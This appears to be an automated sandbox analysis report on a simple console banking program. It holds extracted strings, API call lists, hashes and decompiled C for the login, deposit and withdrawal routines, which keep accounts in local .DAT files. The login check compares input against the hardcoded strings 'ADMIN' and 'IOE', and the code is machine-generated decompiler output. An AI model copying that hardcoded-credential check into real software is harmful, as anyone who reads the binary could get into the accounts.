                                                • _swscanf.LIBCMT ref: 01234B02
                                                • _wprintf.LIBCMT ref: 01234B51
                                                • _wprintf.LIBCMT ref: 01234B67
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Transaction NOT completed!, xrefs: 01234B62
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234AF7
                                                • Withdraw from A/C number : , xrefs: 012349FE
                                                • ACCOUNT.DAT, xrefs: 01234C87
                                                • %s %s %s %s %.2f %s, xrefs: 01234E47
                                                • Transaction completed successfully!, xrefs: 01234E77
                                                • [ %s ], xrefs: 01234A69
                                                • Given A/C number does not exits!, xrefs: 01234A47
                                                • TRANSACTION.DAT, xrefs: 01234E03
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 01234C5F
                                                • Confirm Transaction, xrefs: 01234B9C
                                                • Sorry, the current balance is Rs. %.2f only!, xrefs: 01234B4C
                                                • %s to be Withdrawn from A/C number : %s [%s], xrefs: 01234BD7
                                                • Cash+Withdrawn, xrefs: 01234E3E
                                                • Amount to be Withdrawn (in NRs.) : , xrefs: 01234A7F
                                                • ACCOUNT.DAT, xrefs: 01234AA2
                                                • ACCOUNT.DAT, xrefs: 01234A21
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234CF3
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234DC8
                                                • TEMP.DAT, xrefs: 01234C9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                • API String ID: 427838879-2716176803
                                                • Opcode ID: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction ID: 6f04040dea22da68e6e4612a78f6d78f5b95c4a31de6082b418889cb45a8feed
                                                • Opcode Fuzzy Hash: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction Fuzzy Hash: 5EC1B8F2D3020AABDB11EBE5DC81EEEB778AFA9700F044259F50576080F67066488FB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E012322F0(void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				char _v6;
                                                				signed int _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v60;
                                                				char _v92;
                                                				void* __ebp;
                                                				void* _t50;
                                                				void* _t74;
                                                				void* _t78;
                                                				void* _t85;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                				void* _t101;
                                                				void* _t106;
                                                				void* _t116;
                                                
                                                				_t116 = __fp0;
                                                				_t95 = __esi;
                                                				_t94 = __edi;
                                                				_v60 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				do {
                                                					_v20 = 0;
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E01231380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E0123738B("%s",  &_v92);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					_t100 = _t96 + 0x14;
                                                					E012312F0(_t94, _t95,  &_v60);
                                                					_v16 = _v16 + 1;
                                                					_t110 = _v16 - 3;
                                                					if(_v16 == 3) {
                                                						E012320E0( &_v92, _t94, _t95, _t110, _t116);
                                                						E012312B0(0x19, 8);
                                                						_push(0x124f224);
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						E012312B0(0x16, 0xb);
                                                						_push("Press any key to exit the program...");
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						_t100 = _t100 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_t87 =  &_v92;
                                                					_t50 = E01238230( &_v92, "ADMIN");
                                                					_t101 = _t100 + 8;
                                                					if(_t50 != 0) {
                                                						L6:
                                                						E012320E0(_t87, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124f278);
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t101 + 4;
                                                					} else {
                                                						_t78 = E01238230( &_v60, "IOE");
                                                						_t101 = _t101 + 8;
                                                						if(_t78 != 0) {
                                                							goto L6;
                                                						} else {
                                                							_v20 = 1;
                                                						}
                                                					}
                                                					_t113 = _v20 - 1;
                                                				} while (_v20 != 1);
                                                				do {
                                                					E012320E0(_t87, _t94, _t95, _t113, _t116);
                                                					E012312B0(0x1e, 8);
                                                					_push("1. Add User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xa);
                                                					_push("2. Delete User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xc);
                                                					_push("3. Edit User name / Password");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xe);
                                                					_push("4. View User Log");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0x10);
                                                					_push("5. Exit");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					_t106 = _t96 + 0x14;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						_t114 = _v24 - 0x4e;
                                                						if(_v24 >= 0x4e) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t85, _t94, _t95, _t114);
                                                						_t106 = _t106 + 4;
                                                						_v24 = _v24 + 1;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push(" Press a number between the range [1 -5]  ");
                                                					E0123715C(_t85, _t94, _t95, __eflags);
                                                					_t96 = _t106 + 4;
                                                					_t89 = _v6 - 0x30;
                                                					_v28 = _v6 - 0x30;
                                                					_v12 = _v28;
                                                					_v12 = _v12 - 1;
                                                					__eflags = _v12 - 4;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t89, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press ENTER to return to main menu...");
                                                						_t74 = E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t96 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v12 * 4 +  &M012325A8))) {
                                                							case 0:
                                                								_t74 = E012325C0(_t85, _t94, _t95, _t116);
                                                								goto L23;
                                                							case 1:
                                                								E01232800(__ebx, __ecx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 2:
                                                								E01232B10(__ebx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 3:
                                                								E01232E80(__ebx, __edx, __eflags, __fp0);
                                                								goto L23;
                                                							case 4:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                								E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(_v5 == 0x59) {
                                                									L20:
                                                									E012377B1(0);
                                                								} else {
                                                									__eflags = _v5 - 0x79;
                                                									if(_v5 == 0x79) {
                                                										goto L20;
                                                									}
                                                								}
                                                								goto L23;
                                                						}
                                                					}
                                                					L23:
                                                					_t87 = 1;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return _t74;
                                                			}
































                                                0x012322f0
                                                0x012322f0
                                                0x012322f0
                                                0x012322f6
                                                0x012322fc
                                                0x012322ff
                                                0x01232302
                                                0x01232305
                                                0x01232308
                                                0x0123230b
                                                0x0123230e
                                                0x01232311
                                                0x01232314
                                                0x0123231b
                                                0x01232322
                                                0x01232322
                                                0x0123232d
                                                0x01232332
                                                0x01232337
                                                0x01232347
                                                0x01232350
                                                0x01232355
                                                0x0123235a
                                                0x0123236b
                                                0x01232377
                                                0x0123237c
                                                0x01232381
                                                0x01232386
                                                0x0123238d
                                                0x01232398
                                                0x0123239b
                                                0x0123239f
                                                0x012323a1
                                                0x012323aa
                                                0x012323af
                                                0x012323b4
                                                0x012323c0
                                                0x012323c5
                                                0x012323ca
                                                0x012323cf
                                                0x012323d4
                                                0x012323d4
                                                0x012323de
                                                0x012323e2
                                                0x012323e7
                                                0x012323ec
                                                0x0123240c
                                                0x0123240c
                                                0x01232415
                                                0x0123241a
                                                0x0123241f
                                                0x01232424
                                                0x012323ee
                                                0x012323f7
                                                0x012323fc
                                                0x01232401
                                                0x00000000
                                                0x01232403
                                                0x01232403
                                                0x01232403
                                                0x01232401
                                                0x01232427
                                                0x01232427
                                                0x01232431
                                                0x01232431
                                                0x0123243a
                                                0x0123243f
                                                0x01232444
                                                0x01232450
                                                0x01232455
                                                0x0123245a
                                                0x01232466
                                                0x0123246b
                                                0x01232470
                                                0x0123247c
                                                0x01232481
                                                0x01232486
                                                0x01232492
                                                0x01232497
                                                0x0123249c
                                                0x012324a1
                                                0x012324a8
                                                0x012324ad
                                                0x012324bf
                                                0x012324bf
                                                0x012324c3
                                                0x00000000
                                                0x00000000
                                                0x012324c5
                                                0x012324ca
                                                0x012324cf
                                                0x012324bc
                                                0x012324bc
                                                0x012324d8
                                                0x012324dd
                                                0x012324e2
                                                0x012324e7
                                                0x012324ee
                                                0x012324f1
                                                0x012324f7
                                                0x01232500
                                                0x01232503
                                                0x01232507
                                                0x01232565
                                                0x0123256e
                                                0x01232573
                                                0x01232578
                                                0x01232584
                                                0x01232589
                                                0x0123258e
                                                0x01232593
                                                0x01232509
                                                0x0123250c
                                                0x00000000
                                                0x01232513
                                                0x00000000
                                                0x00000000
                                                0x0123251a
                                                0x00000000
                                                0x00000000
                                                0x01232521
                                                0x00000000
                                                0x00000000
                                                0x01232528
                                                0x00000000
                                                0x00000000
                                                0x0123252f
                                                0x01232538
                                                0x0123253d
                                                0x01232542
                                                0x01232547
                                                0x0123254a
                                                0x0123254e
                                                0x01232551
                                                0x0123255c
                                                0x0123255e
                                                0x01232553
                                                0x01232557
                                                0x0123255a
                                                0x00000000
                                                0x00000000
                                                0x0123255a
                                                0x00000000
                                                0x00000000
                                                0x0123250c
                                                0x01232596
                                                0x01232596
                                                0x0123259b
                                                0x0123259b
                                                0x012325a6

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232337
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 0123235A
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123236B
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 01232381
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012323B4
                                                • _wprintf.LIBCMT ref: 0123241F
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 0123262D
                                                  • Part of subcall function 012325C0: _wscanf.LIBCMT ref: 0123263F
                                                  • Part of subcall function 012325C0: _swscanf.LIBCMT ref: 01232681
                                                  • Part of subcall function 012325C0: _wprintf.LIBCMT ref: 012326D1
                                                • _wprintf.LIBCMT ref: 012323CA
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                • _wprintf.LIBCMT ref: 01232444
                                                • _wprintf.LIBCMT ref: 0123245A
                                                • _wprintf.LIBCMT ref: 01232470
                                                • _wprintf.LIBCMT ref: 01232486
                                                • _wprintf.LIBCMT ref: 0123249C
                                                • _wprintf.LIBCMT ref: 012324CA
                                                • _wprintf.LIBCMT ref: 012324E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                • Enter User name : , xrefs: 01232355
                                                • 5. Exit, xrefs: 01232497
                                                • Press a number between the range [1 -5] , xrefs: 012324DD
                                                • 3. Edit User name / Password, xrefs: 0123246B
                                                • Are you sure you want to exit? <Y/N> : , xrefs: 0123253D
                                                • 4. View User Log, xrefs: 01232481
                                                • Password : , xrefs: 0123237C
                                                • IOE, xrefs: 012323EE
                                                • Press ENTER to return to main menu..., xrefs: 01232589
                                                • 1. Add User, xrefs: 0123243F
                                                • 2. Delete User, xrefs: 01232455
                                                • N, xrefs: 012324BF
                                                • ADMIN, xrefs: 012323D9
                                                • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 01232573
                                                • Only THREE attempts shall be allowed to enter username and password., xrefs: 01232332
                                                • Press any key to exit the program..., xrefs: 012323C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                                • API String ID: 3691436685-2046970424
                                                • Opcode ID: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction ID: 335ee4b4e6891386224e9030417996e0f76fe1bac988ca1193f5b19f2aa8cef2
                                                • Opcode Fuzzy Hash: 239590e6718f3a60601907442e36f194eb8788151cd0ad2a2d7f2f2789d68c82
                                                • Instruction Fuzzy Hash: EA6164F1EB4307A6EB19BBF49D03BBE76715FE1B10F004124EA05792C0E9F162588667
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E01234640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v280;
                                                				char _v360;
                                                				char _v440;
                                                				void* __ebp;
                                                				void* _t57;
                                                				char _t73;
                                                				intOrPtr _t75;
                                                				void* _t80;
                                                				intOrPtr _t81;
                                                				intOrPtr _t86;
                                                				void* _t93;
                                                				intOrPtr _t103;
                                                				intOrPtr _t113;
                                                				intOrPtr _t114;
                                                				intOrPtr _t129;
                                                				intOrPtr _t134;
                                                				void* _t137;
                                                				void* _t141;
                                                				void* _t151;
                                                				void* _t153;
                                                				void* _t154;
                                                				void* _t163;
                                                
                                                				_t170 = __fp0;
                                                				_t168 = __eflags;
                                                				_t136 = __esi;
                                                				_t135 = __edi;
                                                				_t101 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Deposit to A/C number            : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t103 =  *0x1252f28; // 0x0
                                                				_push(_t103);
                                                				E01236DB6(__ebx, _t135, _t136, _t168);
                                                				_t141 = _t137 + 0x18;
                                                				_t169 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t103, _t135, _t136, _t169, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(_t101, _t135, _t136, _t169);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v244);
                                                				_push("[ %s ]");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Deposited (in NRs.) : ");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				E012320E0(_t103, _t135, _t136, __eflags, __fp0);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t57 = E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t57,  &_v280);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v244);
                                                				_push( &_v28);
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
                                                				E01238140( &_v360,  &_v440);
                                                				E01238140( &_v360, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v360) >> 1), 0xe);
                                                				_push( &_v360);
                                                				E01237229(_t101, _t135, _t136, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t101, _t135, _t136, __eflags);
                                                				_t151 = _t141 + 0x24 - 8 + 0x1c;
                                                				_t73 = _v5;
                                                				__eflags = _t73 - 0x59;
                                                				if(_t73 == 0x59) {
                                                					L4:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t75 = E01236EF1("TEMP.DAT", "a");
                                                					_t153 = _t151 + 0x10;
                                                					 *0x1252f24 = _t75;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t129 =  *0x1252f28; // 0x0
                                                						_t80 = E01237021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t154 = _t153 + 0x38;
                                                						__eflags = _t80 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t93 = E01238230( &_v208,  &_v28);
                                                						_t163 = _t154 + 8;
                                                						__eflags = _t93;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("addss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t134 =  *0x1252f24; // 0x0
                                                						_push(_t134);
                                                						E01236F06(_t101, _t135, _t136, __eflags);
                                                						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t81 =  *0x1252f24; // 0x0
                                                					_push(_t81);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					_t113 =  *0x1252f28; // 0x0
                                                					_push(_t113);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Deposited");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t86 =  *0x1252f28; // 0x0
                                                					_push(_t86);
                                                					E01236F06(_t101, _t135, _t136, __eflags);
                                                					_t114 =  *0x1252f28; // 0x0
                                                					_push(_t114);
                                                					E01236DB6(_t101, _t135, _t136, __eflags);
                                                					E012320E0(_t114, _t135, _t136, __eflags, _t170);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t101, _t135, _t136, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L4;
                                                				}
                                                				return _t73;
                                                			}










































                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234640
                                                0x01234649
                                                0x01234650
                                                0x01234659
                                                0x0123465e
                                                0x01234663
                                                0x01234674
                                                0x0123468e
                                                0x01234693
                                                0x01234699
                                                0x0123469a
                                                0x0123469f
                                                0x012346a2
                                                0x012346a6
                                                0x012346a8
                                                0x012346b1
                                                0x012346b6
                                                0x00000000
                                                0x012346c0
                                                0x012346cc
                                                0x012346d7
                                                0x012346d8
                                                0x012346dd
                                                0x012346e9
                                                0x012346ee
                                                0x012346f3
                                                0x01234704
                                                0x0123470c
                                                0x01234715
                                                0x0123471a
                                                0x0123471f
                                                0x01234724
                                                0x01234729
                                                0x01234735
                                                0x0123473e
                                                0x01234749
                                                0x0123474d
                                                0x0123475a
                                                0x01234769
                                                0x01234771
                                                0x01234776
                                                0x01234789
                                                0x0123479d
                                                0x012347c0
                                                0x012347cb
                                                0x012347cc
                                                0x012347d8
                                                0x012347dd
                                                0x012347e2
                                                0x012347e7
                                                0x012347ea
                                                0x012347ee
                                                0x012347f1
                                                0x01234800
                                                0x01234812
                                                0x01234821
                                                0x01234826
                                                0x01234829
                                                0x0123482e
                                                0x01234831
                                                0x01234835
                                                0x01234839
                                                0x0123483d
                                                0x01234844
                                                0x01234848
                                                0x0123484c
                                                0x01234850
                                                0x01234854
                                                0x0123485b
                                                0x01234862
                                                0x0123486f
                                                0x01234876
                                                0x0123487b
                                                0x0123487e
                                                0x01234881
                                                0x00000000
                                                0x00000000
                                                0x01234892
                                                0x01234897
                                                0x0123489a
                                                0x0123489c
                                                0x0123489e
                                                0x012348a3
                                                0x012348a8
                                                0x012348a8
                                                0x012348ad
                                                0x012348b2
                                                0x012348b7
                                                0x012348bc
                                                0x012348c4
                                                0x012348c9
                                                0x012348d1
                                                0x012348d6
                                                0x012348de
                                                0x012348e7
                                                0x012348ee
                                                0x012348f3
                                                0x012348f7
                                                0x012348fb
                                                0x012348ff
                                                0x01234906
                                                0x0123490d
                                                0x01234914
                                                0x01234915
                                                0x0123491a
                                                0x01234920
                                                0x01234921
                                                0x01234926
                                                0x01234926
                                                0x0123492e
                                                0x01234933
                                                0x01234934
                                                0x0123493c
                                                0x01234942
                                                0x01234943
                                                0x0123495d
                                                0x01234967
                                                0x0123496f
                                                0x01234974
                                                0x0123497c
                                                0x01234981
                                                0x01234986
                                                0x0123498b
                                                0x01234993
                                                0x01234994
                                                0x01234999
                                                0x0123499e
                                                0x0123499f
                                                0x012349a7
                                                0x012349ad
                                                0x012349ae
                                                0x012349b6
                                                0x012349bf
                                                0x012349c4
                                                0x00000000
                                                0x012349ce
                                                0x012347f7
                                                0x012347fa
                                                0x00000000
                                                0x00000000
                                                0x012349d4

                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234663
                                                • _wscanf.LIBCMT ref: 01234674
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 012346BB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012346DD
                                                • _wprintf.LIBCMT ref: 012346F3
                                                • _wscanf.LIBCMT ref: 01234704
                                                • _wprintf.LIBCMT ref: 0123471F
                                                • _wprintf.LIBCMT ref: 0123475A
                                                • _wprintf.LIBCMT ref: 012347E2
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • %s to be deposited in A/C number : %s [ %s ], xrefs: 01234755
                                                • Cash+Deposited, xrefs: 0123498B
                                                • Deposit to A/C number : , xrefs: 0123465E
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012347DD
                                                • TRANSACTION.DAT, xrefs: 01234950
                                                • Transaction completed successfully!, xrefs: 012349C4
                                                • %s %s %s %s %.2f %s, xrefs: 01234994
                                                • ACCOUNT.DAT, xrefs: 01234805
                                                • TEMP.DAT, xrefs: 0123481C
                                                • Amount to be Deposited (in NRs.) : , xrefs: 012346EE
                                                • [ %s ], xrefs: 012346D8
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0123486A
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234915
                                                • Confirm Transaction, xrefs: 0123471A
                                                • Given A/C number does not exits!, xrefs: 012346B6
                                                • ACCOUNT.DAT, xrefs: 01234681
                                                Memory Dump Source
